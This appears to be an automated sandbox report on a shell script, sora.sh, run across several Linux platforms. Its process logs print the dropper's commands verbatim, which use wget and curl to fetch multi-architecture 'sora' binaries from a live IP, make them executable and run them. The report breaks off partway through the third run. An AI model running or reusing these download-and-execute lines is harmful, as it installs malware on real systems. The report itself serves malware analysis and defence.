Analysis Overview
SHA256
c4575e4be3ce1429bf36332d68ad7aa6612852748f0a94067e6936433c26f344
Threat Level: Shows suspicious behavior
The file sora.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-29 20:35
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-29 20:35
Reported
2024-08-29 20:38
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
4s
Max time network
133s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.x86]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.mips]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.i468]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.i686]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm4]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm5]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm6]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm7]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.ppc]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.m68k]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.sh4]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| GB | 195.181.164.17:443 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-29 20:35
Reported
2024-08-29 20:38
Platform
debian9-armhf-20240611-en
Max time kernel
31s
Max time network
35s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.x86]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.mips]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.i468]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.i686]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm4]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm5]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm6]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm7]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.ppc]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x robben sora.sh systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-Jtus07]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.m68k]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.sh4]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp | |
| CZ | 188.127.247.15:80 | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-29 20:35
Reported
2024-08-29 20:36
Platform
debian9-mipsbe-20240729-en
Max time kernel
31s
Max time network
32s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.x86]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.mips]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.i468]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.i686]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm4]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm5]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm6]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x robben sora.sh systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-DzP0PQ]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://188.127.247.15/bins/sora.arm7]
/usr/bin/curl
[curl -O http://188.127.247.15/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
